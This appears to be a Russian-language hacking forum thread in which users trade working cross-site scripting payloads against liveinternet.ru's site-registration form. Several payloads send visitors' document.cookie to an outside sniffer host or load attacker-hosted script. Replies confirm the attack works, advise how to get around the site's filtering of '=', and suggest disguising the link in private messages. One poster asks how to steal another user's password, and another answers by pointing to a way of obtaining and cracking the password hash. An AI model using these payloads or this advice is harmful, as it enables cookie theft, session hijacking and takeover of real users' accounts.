|
liveinternet
найдено D=P=CH= MOD=
http://www.liveinternet.ru/add Вводим "><script>alert("xss")</script> алерт работает! Но КУКИ не приходят!!!! Хотя ввожу в поле "Ключевые слова" все верно: "<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;"> либо "<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> и даже этим способом: "<srcipt src=http://мой_сайт.ru/js.js></script> Пробую "регить сайт", заходя со своего акка. Не приходят, мать их!!! Не понимаю, в чем дело? Подскажите! |
Может изза браузера.
|
проверь хтмл код когда вставил снифер.. у меня document.cookie обрезал движок сайта...
если ничо не путаю.. давно это было |
ОК
Все работает.
Просто пытаются фильтровать "=" Ссылку советую маскировать во избежание доп. фильтрации в приватных сообщениях. Вариант со скриптом на собственном хосте прекрасно прокатывает. Тема исчерпана. |
А можно ли как-нибудь на liveintrnet добыть чужой пароль или хотябы читать "закрытые" сообщения (т.е. те которые только для друзей)??? Если да, то как.
Очень надо. Заранее спасибо. |
http://forum.antichat.ru/thread29020.html
получишь хеш пароля в md5(вроде бы) потом расшифруешь пароль и зайдешь... |
| Время: 13:53 |